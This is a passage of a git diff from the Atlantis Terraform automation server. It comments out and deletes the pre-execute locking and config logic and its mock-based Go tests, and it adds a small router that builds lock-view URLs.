+//func TestExecute_LockErr(t *testing.T) {
+//	t.Log("when there is an error returned from TryLock we return it")
+//	p, l, _, _ := setupPreExecuteTest(t)
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err"))
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error())
+//}
+//
+//func TestExecute_LockFailed(t *testing.T) {
+//	t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error")
+//	p, l, _, _ := setupPreExecuteTest(t)
+//	// The response has LockAcquired: false and the pull request is a number
+//	// different than the current pull.
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
+//		LockAcquired: false,
+//		CurrLock:     models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}},
+//	}, nil)
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure)
+//}
+//
+//func TestExecute_ConfigErr(t *testing.T) {
+//	t.Log("when there is an error loading config, we return it")
+//	p, l, _, _ := setupPreExecuteTest(t)
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
+//		LockAcquired: true,
+//	}, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err"))
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "err", res.ProjectResult.Error.Error())
+//}
+//
+//func TestExecute_PreInitErr(t *testing.T) {
+//	t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it")
+//	p, l, tm, r := setupPreExecuteTest(t)
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
+//		LockAcquired: true,
+//	}, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
+//		PreInit: []string{"pre-init"},
+//	}, nil)
+//	tfVersion, _ := version.NewVersion("0.9.0")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//	When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err"))
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error())
+//}
+//
+//func TestExecute_InitErr(t *testing.T) {
+//	t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it")
+//	p, l, tm, _ := setupPreExecuteTest(t)
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
+//		LockAcquired: true,
+//	}, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
+//	tfVersion, _ := version.NewVersion("0.9.0")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err"))
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "err", res.ProjectResult.Error.Error())
+//}
+//
+//func TestExecute_PreGetErr(t *testing.T) {
+//	t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it")
+//	p, l, tm, r := setupPreExecuteTest(t)
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
+//		LockAcquired: true,
+//	}, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
+//		PreGet: []string{"pre-get"},
+//	}, nil)
+//	tfVersion, _ := version.NewVersion("0.8")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//	When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err"))
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error())
+//}
+//
+//func TestExecute_GetErr(t *testing.T) {
+//	t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it")
+//	p, l, tm, _ := setupPreExecuteTest(t)
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
+//		LockAcquired: true,
+//	}, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
+//	tfVersion, _ := version.NewVersion("0.8")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//	When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err"))
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "err", res.ProjectResult.Error.Error())
+//}
+//
+//func TestExecute_PreCommandErr(t *testing.T) {
+//	t.Log("when we get an error running pre commands we return it")
+//	p, l, tm, r := setupPreExecuteTest(t)
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
+//		LockAcquired: true,
+//	}, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
+//		PrePlan: []string{"command"},
+//	}, nil)
+//	tfVersion, _ := version.NewVersion("0.9")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
+//	When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err"))
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error())
+//}
+//
+//func TestExecute_SuccessTF9(t *testing.T) {
+//	t.Log("when the project is on tf >= 0.9 it should be successful")
+//	p, l, tm, r := setupPreExecuteTest(t)
+//	lockResponse := locking.TryLockResponse{
+//		LockAcquired: true,
+//	}
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	config := events.ProjectConfig{
+//		PreInit: []string{"pre-init"},
+//	}
+//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	tfVersion, _ := version.NewVersion("0.9")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, events.TryLockResponse{
+//		ProjectConfig:    config,
+//		TerraformVersion: tfVersion,
+//		LockResponse:     lockResponse,
+//	}, res)
+//	tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion)
+//	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")
+//}
+//
+//func TestExecute_SuccessTF8(t *testing.T) {
+//	t.Log("when the project is on tf < 0.9 it should be successful")
+//	p, l, tm, r := setupPreExecuteTest(t)
+//	lockResponse := locking.TryLockResponse{
+//		LockAcquired: true,
+//	}
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	config := events.ProjectConfig{
+//		PreGet: []string{"pre-get"},
+//	}
+//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	tfVersion, _ := version.NewVersion("0.8")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, events.TryLockResponse{
+//		ProjectConfig:    config,
+//		TerraformVersion: tfVersion,
+//		LockResponse:     lockResponse,
+//	}, res)
+//	tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")
+//	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")
+//}
+//
+//func TestExecute_SuccessPrePlan(t *testing.T) {
+//	t.Log("when there are pre_plan commands they are run")
+//	p, l, tm, r := setupPreExecuteTest(t)
+//	lockResponse := locking.TryLockResponse{
+//		LockAcquired: true,
+//	}
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	config := events.ProjectConfig{
+//		PrePlan: []string{"command"},
+//	}
+//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	tfVersion, _ := version.NewVersion("0.9")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//
+//	res := p.Execute(&ctx, "", project)
+//	Equals(t, events.TryLockResponse{
+//		ProjectConfig:    config,
+//		TerraformVersion: tfVersion,
+//		LockResponse:     lockResponse,
+//	}, res)
+//	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")
+//}
+//
+//func TestExecute_SuccessPreApply(t *testing.T) {
+//	t.Log("when there are pre_apply commands they are run")
+//	p, l, tm, r := setupPreExecuteTest(t)
+//	lockResponse := locking.TryLockResponse{
+//		LockAcquired: true,
+//	}
+//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
+//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	config := events.ProjectConfig{
+//		PreApply: []string{"command"},
+//	}
+//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	tfVersion, _ := version.NewVersion("0.9")
+//	When(tm.Version()).ThenReturn(tfVersion)
+//
+//	cpCtx := deepcopy.Copy(ctx).(events.CommandContext)
+//	cpCtx.Command = &events.Command{
+//		Name: events.Apply,
+//	}
+//	cpCtx.Log = logging.NewNoopLogger()
+//
+//	res := p.Execute(&cpCtx, "", project)
+//	Equals(t, events.TryLockResponse{
+//		ProjectConfig:    config,
+//		TerraformVersion: tfVersion,
+//		LockResponse:     lockResponse,
+//	}, res)
+//	r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply")
+//}
+//
+//func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectLocker, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) {
+//	RegisterMockTestingT(t)
+//	l := lmocks.NewMockLocker()
+//	cr := mocks.NewMockProjectConfigReader()
+//	tm := tmocks.NewMockClient()
+//	r := rmocks.NewMockRunner()
+//	return &events.DefaultProjectLocker{
+//		Locker:       l,
+//		ConfigReader: cr,
+//		Terraform:    tm,
+//		Run:          r,
+//	}, l, tm, r
+//}
diff --git a/server/events/project_pre_execute.go b/server/events/project_pre_execute.go
deleted file mode 100644
index b9f1625336..0000000000
--- a/server/events/project_pre_execute.go
+++ /dev/null
@@ -1,140 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
-	"fmt"
-	"path/filepath"
-	"strings"
-
-	"github.com/hashicorp/go-version"
-	"github.com/pkg/errors"
-	"github.com/runatlantis/atlantis/server/events/locking"
-	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/run"
-	"github.com/runatlantis/atlantis/server/events/terraform"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_pre_executor.go ProjectPreExecutor
-
-// ProjectPreExecutor executes before the plan and apply executors. It handles
-// the setup tasks that are common to both plan and apply.
-type ProjectPreExecutor interface {
-	// Execute executes the pre plan/apply tasks.
-	Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult
-}
-
-// DefaultProjectPreExecutor implements ProjectPreExecutor.
-type DefaultProjectPreExecutor struct {
-	Locker       locking.Locker
-	ConfigReader ProjectConfigReader
-	Terraform    terraform.Client
-	Run          run.Runner
-}
-
-// PreExecuteResult is the result of running the pre execute.
-type PreExecuteResult struct {
-	ProjectResult    ProjectResult
-	ProjectConfig    ProjectConfig
-	TerraformVersion *version.Version
-	LockResponse     locking.TryLockResponse
-}
-
-// Execute executes the pre plan/apply tasks.
-func (p *DefaultProjectPreExecutor) Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult {
-	workspace := ctx.Command.Workspace
-	lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User)
-	if err != nil {
-		return PreExecuteResult{ProjectResult: ProjectResult{Error: errors.Wrap(err, "acquiring lock")}}
-	}
-	if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num {
-		return PreExecuteResult{ProjectResult: ProjectResult{Failure: fmt.Sprintf(
-			"This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.",
-			lockAttempt.CurrLock.Pull.Num)}}
-	}
-	ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey)
-	config, tfVersion, err := p.executeWithLock(ctx, repoDir, project)
-	if err != nil {
-		p.Locker.Unlock(lockAttempt.LockKey) // nolint: errcheck
-		return PreExecuteResult{ProjectResult: ProjectResult{Error: err}}
-	}
-	return PreExecuteResult{ProjectConfig: config, TerraformVersion: tfVersion, LockResponse: lockAttempt}
-}
-
-// executeWithLock executes the pre plan/apply tasks after the lock has been
-// acquired. This helper func makes revoking the lock on error easier.
-// Returns the project config, terraform version, or an error.
-func (p *DefaultProjectPreExecutor) executeWithLock(ctx *CommandContext, repoDir string, project models.Project) (ProjectConfig, *version.Version, error) {
-	workspace := ctx.Command.Workspace
-
-	// Check if config file is found, if not we continue the run.
-	var config ProjectConfig
-	absolutePath := filepath.Join(repoDir, project.Path)
-	if p.ConfigReader.Exists(absolutePath) {
-		var err error
-		config, err = p.ConfigReader.Read(absolutePath)
-		if err != nil {
-			return config, nil, err
-		}
-		ctx.Log.Info("parsed atlantis config file in %q", absolutePath)
-	}
-
-	// Check if terraform version is >= 0.9.0.
-	terraformVersion := p.Terraform.Version()
-	if config.TerraformVersion != nil {
-		terraformVersion = config.TerraformVersion
-	}
-	constraints, _ := version.NewConstraint(">= 0.9.0")
-	if constraints.Check(terraformVersion) {
-		ctx.Log.Info("determined that we are running terraform with version >= 0.9.0. Running version %s", terraformVersion)
-		if len(config.PreInit) > 0 {
-			_, err := p.Run.Execute(ctx.Log, config.PreInit, absolutePath, workspace, terraformVersion, "pre_init")
-			if err != nil {
-				return config, nil, errors.Wrapf(err, "running %s commands", "pre_init")
-			}
-		}
-		_, err := p.Terraform.Init(ctx.Log, absolutePath, workspace, config.GetExtraArguments("init"), terraformVersion)
-		if err != nil {
-			return config, nil, err
-		}
-	} else {
-		ctx.Log.Info("determined that we are running terraform with version < 0.9.0. Running version %s", terraformVersion)
-		if len(config.PreGet) > 0 {
-			_, err := p.Run.Execute(ctx.Log, config.PreGet, absolutePath, workspace, terraformVersion, "pre_get")
-			if err != nil {
-				return config, nil, errors.Wrapf(err, "running %s commands", "pre_get")
-			}
-		}
-		terraformGetCmd := append([]string{"get", "-no-color"}, config.GetExtraArguments("get")...)
-		_, err := p.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, terraformGetCmd, terraformVersion, workspace)
-		if err != nil {
-			return config, nil, err
-		}
-	}
-
-	stage := fmt.Sprintf("pre_%s", strings.ToLower(ctx.Command.Name.String()))
-	var commands []string
-	if ctx.Command.Name == Plan {
-		commands = config.PrePlan
-	} else {
-		commands = config.PreApply
-	}
-	if len(commands) > 0 {
-		_, err := p.Run.Execute(ctx.Log, commands, absolutePath, workspace, terraformVersion, stage)
-		if err != nil {
-			return config, nil, errors.Wrapf(err, "running %s commands", stage)
-		}
-	}
-	return config, terraformVersion, nil
-}
diff --git a/server/events/project_pre_execute_test.go b/server/events/project_pre_execute_test.go
deleted file mode 100644
index 27814055f2..0000000000
--- a/server/events/project_pre_execute_test.go
+++ /dev/null
@@ -1,282 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
-	"errors"
-	"testing"
-
-	"github.com/hashicorp/go-version"
-	"github.com/mohae/deepcopy"
-	. "github.com/petergtz/pegomock"
-	"github.com/runatlantis/atlantis/server/events"
-	"github.com/runatlantis/atlantis/server/events/locking"
-	lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
-	"github.com/runatlantis/atlantis/server/events/mocks"
-	"github.com/runatlantis/atlantis/server/events/models"
-	rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
-	tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
-	"github.com/runatlantis/atlantis/server/logging"
-	. "github.com/runatlantis/atlantis/testing"
-)
-
-var ctx = events.CommandContext{
-	Command: &events.Command{
-		Name: events.Plan,
-	},
-	Log: logging.NewNoopLogger(),
-}
-var project = models.Project{}
-
-func TestExecute_LockErr(t *testing.T) {
-	t.Log("when there is an error returned from TryLock we return it")
-	p, l, _, _ := setupPreExecuteTest(t)
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err"))
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_LockFailed(t *testing.T) {
-	t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error")
-	p, l, _, _ := setupPreExecuteTest(t)
-	// The response has LockAcquired: false and the pull request is a number
-	// different than the current pull.
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-		LockAcquired: false,
-		CurrLock:     models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}},
-	}, nil)
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure)
-}
-
-func TestExecute_ConfigErr(t *testing.T) {
-	t.Log("when there is an error loading config, we return it")
-	p, l, _, _ := setupPreExecuteTest(t)
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-		LockAcquired: true,
-	}, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err"))
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreInitErr(t *testing.T) {
-	t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it")
-	p, l, tm, r := setupPreExecuteTest(t)
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-		LockAcquired: true,
-	}, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
-		PreInit: []string{"pre-init"},
-	}, nil)
-	tfVersion, _ := version.NewVersion("0.9.0")
-	When(tm.Version()).ThenReturn(tfVersion)
-	When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err"))
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_InitErr(t *testing.T) {
-	t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it")
-	p, l, tm, _ := setupPreExecuteTest(t)
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-		LockAcquired: true,
-	}, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
-	tfVersion, _ := version.NewVersion("0.9.0")
-	When(tm.Version()).ThenReturn(tfVersion)
-	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err"))
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreGetErr(t *testing.T) {
-	t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it")
-	p, l, tm, r := setupPreExecuteTest(t)
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-		LockAcquired: true,
-	}, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
-		PreGet: []string{"pre-get"},
-	}, nil)
-	tfVersion, _ := version.NewVersion("0.8")
-	When(tm.Version()).ThenReturn(tfVersion)
-	When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err"))
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_GetErr(t *testing.T) {
-	t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it")
-	p, l, tm, _ := setupPreExecuteTest(t)
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-		LockAcquired: true,
-	}, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
-	tfVersion, _ := version.NewVersion("0.8")
-	When(tm.Version()).ThenReturn(tfVersion)
-	When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err"))
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreCommandErr(t *testing.T) {
-	t.Log("when we get an error running pre commands we return it")
-	p, l, tm, r := setupPreExecuteTest(t)
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-		LockAcquired: true,
-	}, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
-		PrePlan: []string{"command"},
-	}, nil)
-	tfVersion, _ := version.NewVersion("0.9")
-	When(tm.Version()).ThenReturn(tfVersion)
-	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
-	When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err"))
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_SuccessTF9(t *testing.T) {
-	t.Log("when the project is on tf >= 0.9 it should be successful")
-	p, l, tm, r := setupPreExecuteTest(t)
-	lockResponse := locking.TryLockResponse{
-		LockAcquired: true,
-	}
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	config := events.ProjectConfig{
-		PreInit: []string{"pre-init"},
-	}
-	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
-	tfVersion, _ := version.NewVersion("0.9")
-	When(tm.Version()).ThenReturn(tfVersion)
-	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, events.PreExecuteResult{
-		ProjectConfig:    config,
-		TerraformVersion: tfVersion,
-		LockResponse:     lockResponse,
-	}, res)
-	tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion)
-	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")
-}
-
-func TestExecute_SuccessTF8(t *testing.T) {
-	t.Log("when the project is on tf < 0.9 it should be successful")
-	p, l, tm, r := setupPreExecuteTest(t)
-	lockResponse := locking.TryLockResponse{
-		LockAcquired: true,
-	}
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	config := events.ProjectConfig{
-		PreGet: []string{"pre-get"},
-	}
-	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
-	tfVersion, _ := version.NewVersion("0.8")
-	When(tm.Version()).ThenReturn(tfVersion)
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, events.PreExecuteResult{
-		ProjectConfig:    config,
-		TerraformVersion: tfVersion,
-		LockResponse:     lockResponse,
-	}, res)
-	tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")
-	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")
-}
-
-func TestExecute_SuccessPrePlan(t *testing.T) {
-	t.Log("when there are pre_plan commands they are run")
-	p, l, tm, r := setupPreExecuteTest(t)
-	lockResponse := locking.TryLockResponse{
-		LockAcquired: true,
-	}
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	config := events.ProjectConfig{
-		PrePlan: []string{"command"},
-	}
-	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
-	tfVersion, _ := version.NewVersion("0.9")
-	When(tm.Version()).ThenReturn(tfVersion)
-
-	res := p.Execute(&ctx, "", project)
-	Equals(t, events.PreExecuteResult{
-		ProjectConfig:    config,
-		TerraformVersion: tfVersion,
-		LockResponse:     lockResponse,
-	}, res)
-	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")
-}
-
-func TestExecute_SuccessPreApply(t *testing.T) {
-	t.Log("when there are pre_apply commands they are run")
-	p, l, tm, r := setupPreExecuteTest(t)
-	lockResponse := locking.TryLockResponse{
-		LockAcquired: true,
-	}
-	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-	When(p.ConfigReader.Exists("")).ThenReturn(true)
-	config := events.ProjectConfig{
-		PreApply: []string{"command"},
-	}
-	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
-	tfVersion, _ := version.NewVersion("0.9")
-	When(tm.Version()).ThenReturn(tfVersion)
-
-	cpCtx := deepcopy.Copy(ctx).(events.CommandContext)
-	cpCtx.Command = &events.Command{
-		Name: events.Apply,
-	}
-	cpCtx.Log = logging.NewNoopLogger()
-
-	res := p.Execute(&cpCtx, "", project)
-	Equals(t, events.PreExecuteResult{
-		ProjectConfig:    config,
-		TerraformVersion: tfVersion,
-		LockResponse:     lockResponse,
-	}, res)
-	r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply")
-}
-
-func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectPreExecutor, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) {
-	RegisterMockTestingT(t)
-	l := lmocks.NewMockLocker()
-	cr := mocks.NewMockProjectConfigReader()
-	tm := tmocks.NewMockClient()
-	r := rmocks.NewMockRunner()
-	return &events.DefaultProjectPreExecutor{
-		Locker:       l,
-		ConfigReader: cr,
-		Terraform:    tm,
-		Run:          r,
-	}, l, tm, r
-}
diff --git a/server/router.go b/server/router.go
new file mode 100644
index 0000000000..af9319b987
--- /dev/null
+++ b/server/router.go
@@ -0,0 +1,31 @@
+package server
+
+import (
+	"fmt"
+	"net/url"
+
+	"github.com/gorilla/mux"
+)
+
+// Router can be used to retrieve Atlantis URLs. It acts as an intermediary
+// between the underlying router and the rest of Atlantis that might need to
+// know URLs to different resources.
+type Router struct {
+	// Underlying is the router that the routes have been constructed on.
+	Underlying *mux.Router
+	// LockViewRouteName is the named route for the lock view that can be Get'd
+	// from the Underlying router.
+	LockViewRouteName string
+	// LockViewRouteIDQueryParam is the query parameter needed to construct the
+	// lock view: underlying.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id").
+	LockViewRouteIDQueryParam string
+	// AtlantisURL is the fully qualified URL (scheme included) that Atlantis is
+	// being served at, ex: https://example.com.
+	AtlantisURL string
+}
+
+// GenerateLockURL returns a fully qualified URL to view the lock at lockID.
+func (r *Router) GenerateLockURL(lockID string) string {
+	path, _ := r.Underlying.Get(r.LockViewRouteName).URL(r.LockViewRouteIDQueryParam, url.QueryEscape(lockID))
+	return fmt.Sprintf("%s%s", r.AtlantisURL, path)
+}
diff --git a/server/server.go b/server/server.go
index ee0ffdf119..e53de94a11 100644
--- a/server/server.go
+++ b/server/server.go
@@ -36,6 +36,7 @@ import (
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/locking/boltdb"
 	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	"github.com/runatlantis/atlantis/server/events/run"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
@@ -46,7 +47,16 @@ import (
 	"github.com/urfave/negroni"
 )
 
